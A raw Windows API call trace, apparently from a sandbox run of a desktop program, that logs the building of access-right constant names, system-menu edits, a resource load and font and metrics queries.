[0180.515] SysReAllocStringLen (in: pbstr=0x28be560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x28be560*="THREAD_SET_CONTEXT") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x28be550*="THREAD_GET_CONTEXT") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x28be540*="THREAD_SUSPEND_RESUME") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x28be530*="THREAD_TERMINATE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x28be520*="THREAD_ALL_ACCESS") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be500*="STANDARD_RIGHTS_WRITE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be4f0*="STANDARD_RIGHTS_READ") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be4e0*="STANDARD_RIGHTS_ALL") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be4d0*="DELETE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be4c0*="READ_CONTROL") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be4b0*="WRITE_OWNER") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be4a0*="WRITE_DAC") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x28be490*="PROCESS_QUERY_INFORMATION") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x28be480*="PROCESS_SET_INFORMATION") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x28be470*="PROCESS_SET_QUOTA") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x28be460*="PROCESS_CREATE_PROCESS") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x28be450*="PROCESS_DUP_HANDLE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x28be440*="PROCESS_VM_WRITE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x28be430*="PROCESS_VM_READ") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x28be420*="PROCESS_VM_OPERATION") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x28be410*="PROCESS_SET_SESSIONID") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x28be400*="PROCESS_CREATE_THREAD") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x28be3f0*="PROCESS_TERMINATE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x28be3e0*="PROCESS_ALL_ACCESS") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be3b0*="STANDARD_RIGHTS_READ") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be3a0*="STANDARD_RIGHTS_ALL") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be390*="DELETE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be380*="READ_CONTROL") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be370*="WRITE_OWNER") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be360*="WRITE_DAC") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x28be350*="PERM_FILE_CREATE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x28be340*="PERM_FILE_WRITE") returned 1
[0180.516] SysReAllocStringLen (in: pbstr=0x28be330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x28be330*="PERM_FILE_READ") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be310*="STANDARD_RIGHTS_WRITE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be300*="STANDARD_RIGHTS_READ") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be2f0*="STANDARD_RIGHTS_ALL") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be2e0*="DELETE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be2d0*="READ_CONTROL") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be2c0*="WRITE_OWNER") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be2b0*="WRITE_DAC") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x28be2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x28be290*="PRINTER_ACCESS_USE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x28be280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x28be270*="SERVER_ACCESS_ENUMERATE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x28be260*="SERVER_ACCESS_ADMINISTER") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x28be250*="PRINTER_ALL_ACCESS") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x28be240*="PRINTER_EXECUTE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x28be230*="PRINTER_WRITE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x28be220*="PRINTER_READ") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x28be210*="PRINTER_ALL_ACCESS") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be200*="DELETE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be1f0*="READ_CONTROL") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be1e0*="WRITE_OWNER") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be1d0*="WRITE_DAC") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x28be1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x28be1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x28be1a0*="SC_MANAGER_LOCK") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x28be190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x28be180*="SC_MANAGER_CONNECT") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x28be170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x28be160*="SC_MANAGER_ALL_ACCESS") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be140*="STANDARD_RIGHTS_WRITE") returned 1
[0180.517] SysReAllocStringLen (in: pbstr=0x28be130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be130*="STANDARD_RIGHTS_READ") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be120*="STANDARD_RIGHTS_ALL") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be110*="DELETE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be100*="READ_CONTROL") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be0f0*="WRITE_OWNER") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be0e0*="WRITE_DAC") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x28be0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x28be0c0*="SERVICE_STOP") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x28be0b0*="SERVICE_START") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x28be0a0*="SERVICE_QUERY_STATUS") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x28be090*="SERVICE_QUERY_CONFIG") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x28be080*="SERVICE_PAUSE_CONTINUE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x28be070*="SERVICE_INTERROGATE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x28be060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x28be050*="SERVICE_CHANGE_CONFIG") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x28be040*="SERVICE_ALL_ACCESS") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be020*="STANDARD_RIGHTS_WRITE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be010*="STANDARD_RIGHTS_READ") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28be000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be000*="STANDARD_RIGHTS_ALL") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28bdff0*="DELETE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28bdfe0*="READ_CONTROL") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28bdfd0*="WRITE_OWNER") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28bdfc0*="WRITE_DAC") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x28bdfb0*="KEY_SET_VALUE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x28bdfa0*="KEY_CREATE_LINK") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x28bdf90*="KEY_CREATE_SUB_KEY") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x28bdf80*="KEY_NOTIFY") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x28bdf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x28bdf60*="KEY_QUERY_VALUE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28bdf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28bdf40*="STANDARD_RIGHTS_WRITE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x28bdf30*="STANDARD_RIGHTS_READ 2") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x28bdf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28bdf10*="DELETE") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28bdf00*="READ_CONTROL") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28bdef0*="WRITE_OWNER") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bdee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28bdee0*="WRITE_DAC") returned 1
[0180.518] SysReAllocStringLen (in: pbstr=0x28bded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x28bded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x28bdec0*="DESKTOP_WRITEOBJECTS") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x28bdeb0*="DESKTOP_JOURNALRECORD") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x28bdea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x28bde90*="DESKTOP_HOOKCONTROL") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x28bde80*="DESKTOP_CREATEWINDOW") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x28bde70*="DESKTOP_CREATEMENU") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x28bde60*="DESKTOP_READOBJECTS") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x28bde50*="DESKTOP_ENUMERATE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28bde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28bde30*="STANDARD_RIGHTS_WRITE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28bde20*="STANDARD_RIGHTS_READ") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28bde10*="STANDARD_RIGHTS_ALL") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28bde00*="DELETE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28bddf0*="READ_CONTROL") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28bdde0*="WRITE_OWNER") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28bddd0*="WRITE_DAC") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x28bddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x28bddb0*="WINSTA_READSCREEN") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x28bdda0*="WINSTA_READATTRIBUTES") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x28bdd90*="WINSTA_EXITWINDOWS") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x28bdd80*="WINSTA_ENUMERATE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x28bdd70*="WINSTA_ENUMDESKTOPS") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x28bdd60*="WINSTA_CREATEDESKTOP") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x28bdd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x28bdd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28bdd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28bdd20*="STANDARD_RIGHTS_WRITE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28bdd10*="STANDARD_RIGHTS_READ") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x28bdd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28bdcf0*="READ_CONTROL") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x28bdce0*="SI_ACCESS_SPECIFIC") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28bdcd0*="WRITE_DAC") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x28bdcc0*="FILE_DELETE") returned 1
[0180.519] SysReAllocStringLen (in: pbstr=0x28bdcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x28bdcb0*="FILE_DELETE_CHILD") returned 1
[0180.521] SetClassLongA (hWnd=0x1101e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0180.521] GetSystemMenu (hWnd=0x1101e8, bRevert=0) returned 0xc01af
[0180.521] DeleteMenu (hMenu=0xc01af, uPosition=0xf030, uFlags=0x0) returned 1
[0180.521] DeleteMenu (hMenu=0xc01af, uPosition=0xf000, uFlags=0x0) returned 1
[0180.521] DeleteMenu (hMenu=0xc01af, uPosition=0xf010, uFlags=0x0) returned 1
[0180.521] GetCurrentThreadId () returned 0x414
[0180.521] ResetEvent (hEvent=0xa0) returned 1
[0180.521] GetCurrentThreadId () returned 0x414
[0180.521] GetCurrentThreadId () returned 0x414
[0180.521] GetCurrentThreadId () returned 0x414
[0180.521] ResetEvent (hEvent=0xa0) returned 1
[0180.522] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f734, fWinIni=0x0 | out: pvParam=0x6f734) returned 1
[0180.522] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f734, fWinIni=0x0 | out: pvParam=0x6f734) returned 1
[0180.522] GetSystemMetrics (nIndex=49) returned 16
[0180.522] GetSystemMetrics (nIndex=50) returned 16
[0180.522] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f77c, fWinIni=0x0 | out: pvParam=0x6f77c) returned 1
[0180.522] IsWindowVisible (hWnd=0x1101e8) returned 0
[0180.522] GetCurrentThreadId () returned 0x414
[0180.522] VirtualQuery (in: lpAddress=0x2891668, lpBuffer=0x6f64c, dwLength=0x1c | out: lpBuffer=0x6f64c*(BaseAddress=0x2891000, AllocationBase=0x27d0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0180.522] FindResourceA (hModule=0x27d0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x28d8990
[0180.523] FindResourceA (hModule=0x27d0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x28d8990
[0180.523] LoadResource (hModule=0x27d0000, hResInfo=0x28d8990) returned 0x28df044
[0180.523] SizeofResource (hModule=0x27d0000, hResInfo=0x28d8990) returned 0xca5
[0180.523] LockResource (hResData=0x28df044) returned 0x28df044
[0180.523] GetCurrentThreadId () returned 0x414
[0180.523] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f400, fWinIni=0x0 | out: pvParam=0x6f400) returned 1
[0180.523] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f400, fWinIni=0x0 | out: pvParam=0x6f400) returned 1
[0180.523] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f400, fWinIni=0x0 | out: pvParam=0x6f400) returned 1
[0180.523] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f400, fWinIni=0x0 | out: pvParam=0x6f400) returned 1
[0180.524] GetDC (hWnd=0x0) returned 0xed010836
[0180.524] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.524] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
